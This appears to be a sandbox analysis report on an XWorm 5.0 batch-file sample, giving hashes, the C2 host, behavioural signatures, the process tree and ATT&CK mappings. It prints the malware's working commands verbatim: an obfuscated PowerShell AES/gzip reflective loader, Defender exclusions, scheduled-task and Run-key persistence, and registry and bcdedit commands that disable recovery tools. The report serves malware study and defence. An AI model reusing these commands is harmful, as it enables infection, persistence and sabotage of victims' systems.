Analysis
- max time kernel: 298s
- max time network: 300s
- platform: windows11-21h2_x64
- resource: win11-20240802-en
- resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 25/08/2024, 06:57

Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample Uni.bat, resource win10-20240611-en)
- Behavioral task: behavioral2 (sample Uni.bat, resource win11-20240802-en)
General
- Target: Uni.bat
- Size: 359KB
- MD5: 358406bc7ed5155f85a5ff1c578ee295
- SHA1: 4e333529ae320ad77ebcc36fd9baa55796dc001d
- SHA256: da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf
- SHA512: 0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45
- SSDEEP: 6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh
Malware Config
Extracted
- Family: xworm
- Version: 5.0
- C2: las-protected.gl.at.ply.gg:59571
- bDBtf4nPCk2LZaWE
- Install_directory: %Userprofile%
- install_file: Uni.exe
Signatures

Detect Xworm Payload (1 IoC)
- yara_rule family_xworm: behavioral2/memory/696-47-0x0000015BF56E0000-0x0000015BF56F0000-memory.dmp

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
- PID 4360 bcdedit.exe
- PID 2544 bcdedit.exe

Blocklisted process makes network request (2 IoCs)
- flow 10, PID 696 powershell.exe
- flow 11, PID 696 powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- PID 4564 powershell.exe
- PID 4128 powershell.exe
- PID 4256 powershell.exe
- PID 3272 powershell.exe
- PID 3324 powershell.exe
- PID 1456 powershell.exe
- PID 696 powershell.exe

Disables RegEdit via registry modification (1 IoC)
- Set value (int) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (reg.exe)

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

Drops startup file (2 IoCs)
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk (powershell.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk (powershell.exe)

Executes dropped EXE (1 IoC)
- PID 124 Uni.exe

Adds Run key to start application (2 TTPs, 1 IoC)
- Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" (powershell.exe)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 6, ip-api.com

Drops file in System32 directory (2 IoCs)
- File opened for modification C:\Windows\system32\Recovery (ReAgentc.exe)
- File opened for modification C:\Windows\system32\Recovery\ReAgent.xml (ReAgentc.exe)

Drops file in Windows directory (4 IoCs)
- File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log (ReAgentc.exe)
- File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log (ReAgentc.exe)
- File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml (ReAgentc.exe)
- File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml (ReAgentc.exe)
Launches sc.exe (2 IoCs)
Sc.exe is a Windows utility to control services on the system.
- PID 1544 sc.exe
- PID 4480 sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
- Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings (powershell.exe)

Runs net.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 3408 schtasks.exe

Suspicious behavior: EnumeratesProcesses (17 IoCs)
- PID 3324 powershell.exe (2 entries)
- PID 1456 powershell.exe (2 entries)
- PID 696 powershell.exe (3 entries)
- PID 4128 powershell.exe (2 entries)
- PID 4256 powershell.exe (2 entries)
- PID 3272 powershell.exe (2 entries)
- PID 4564 powershell.exe (2 entries)
- PID 124 Uni.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Token SeDebugPrivilege: PID 3324 powershell.exe
- Token SeDebugPrivilege: PID 1456 powershell.exe
- PID 1456 powershell.exe then adjusts, in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36. The same sequence is recorded three times; the third pass ends at 35, where the 64-entry limit is reached.

Suspicious use of SetWindowsHookEx (1 IoC)
- PID 696 powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs: 32 distinct parent/child pairs, each recorded twice)
- PID 4852 cmd.exe wrote to memory of 3076 (procid_target 82)
- PID 3076 net.exe wrote to memory of 3416 (procid_target 83)
- PID 4852 cmd.exe wrote to memory of 3324 (procid_target 85)
- PID 3324 powershell.exe wrote to memory of 1456 (procid_target 87)
- PID 3324 powershell.exe wrote to memory of 4372 (procid_target 89)
- PID 4372 WScript.exe wrote to memory of 644 (procid_target 90)
- PID 644 cmd.exe wrote to memory of 3460 (procid_target 92)
- PID 3460 net.exe wrote to memory of 1388 (procid_target 93)
- PID 644 cmd.exe wrote to memory of 696 (procid_target 94)
- PID 696 powershell.exe wrote to memory of 4128 (procid_target 95)
- PID 696 powershell.exe wrote to memory of 4256 (procid_target 97)
- PID 696 powershell.exe wrote to memory of 3272 (procid_target 99)
- PID 696 powershell.exe wrote to memory of 4564 (procid_target 101)
- PID 696 powershell.exe wrote to memory of 3408 (procid_target 103)
- PID 696 powershell.exe wrote to memory of 4488 (procid_target 113)
- PID 4488 cmd.exe wrote to memory of 3488 (procid_target 115)
- PID 4488 cmd.exe wrote to memory of 5096 (procid_target 116)
- PID 4488 cmd.exe wrote to memory of 1992 (procid_target 117)
- PID 4488 cmd.exe wrote to memory of 1532 (procid_target 118)
- PID 4488 cmd.exe wrote to memory of 3188 (procid_target 119)
- PID 4488 cmd.exe wrote to memory of 4360 (procid_target 120)
- PID 4488 cmd.exe wrote to memory of 1520 (procid_target 121)
- PID 4488 cmd.exe wrote to memory of 2036 (procid_target 122)
- PID 4488 cmd.exe wrote to memory of 3408 (procid_target 123)
- PID 4488 cmd.exe wrote to memory of 820 (procid_target 124)
- PID 4488 cmd.exe wrote to memory of 3504 (procid_target 125)
- PID 4488 cmd.exe wrote to memory of 4660 (procid_target 126)
- PID 4488 cmd.exe wrote to memory of 936 (procid_target 127)
- PID 4488 cmd.exe wrote to memory of 1948 (procid_target 128)
- PID 4488 cmd.exe wrote to memory of 4776 (procid_target 129)
- PID 4488 cmd.exe wrote to memory of 3544 (procid_target 130)
- PID 4488 cmd.exe wrote to memory of 4108 (procid_target 131)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(process tree; the bracketed number is the nesting depth, sub-bullets are the signatures matched on that process)

[1] C:\Windows\system32\cmd.exe (PID 4852): C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 3076): net file
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 3416): C:\Windows\system32\net1 file
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3324): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1456): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_771_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_771.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WScript.exe (PID 4372): "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_771.vbs"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe (PID 644): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_771.bat" "
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe (PID 3460): net file
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe (PID 1388): C:\Windows\system32\net1 file
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 696): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_771.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Drops startup file
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4128): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4256): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3272): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4564): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\schtasks.exe (PID 3408): "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
              - Scheduled Task/Job: Scheduled Task
          [6] C:\Windows\system32\cmd.exe (PID 4488): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fhycjt.bat" "
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\ReAgentc.exe (PID 3488): reagentc /disable
                - Drops file in System32 directory
                - Drops file in Windows directory
            [7] C:\Windows\system32\reg.exe (PID 5096): REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 1992): REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 1532): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 3188): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\bcdedit.exe (PID 4360): bcdedit /set {default} bootstatuspolicy ignoreallfailures
                - Modifies boot configuration data using bcdedit
            [7] C:\Windows\system32\reg.exe (PID 1520): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 2036): REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
            [7] C:\Windows\system32\reg.exe (PID 3408): REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 820): REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 3504): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 4660): REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
            [7] C:\Windows\system32\reg.exe (PID 936): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
                - Disables RegEdit via registry modification
            [7] C:\Windows\system32\reg.exe (PID 1948): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
            [7] C:\Windows\system32\reg.exe (PID 4776): REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 3544): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 4108): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 760): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 3176): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 3028): REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 4880): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\bcdedit.exe (PID 2544): bcdedit /set {default} recoveryenabled No
                - Modifies boot configuration data using bcdedit
            [7] C:\Windows\system32\reg.exe (PID 5108): REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
            [7] C:\Windows\system32\reg.exe (PID 3372): REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\reg.exe (PID 424): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
            [7] C:\Windows\system32\reg.exe (PID 772): REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
            [7] C:\Windows\system32\schtasks.exe (PID 4940): schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
            [7] C:\Windows\system32\schtasks.exe (PID 4968): schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
            [7] C:\Windows\system32\reg.exe (PID 3600): REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
            [7] C:\Windows\system32\reg.exe (PID 2836): REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
            [7] C:\Windows\system32\sc.exe (PID 4480): sc config wercplsupport start=disabled
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe (PID 1544): sc config WerSvc start=disabled
                - Launches sc.exe

[1] C:\Users\Admin\Uni.exe (PID 124): C:\Users\Admin\Uni.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads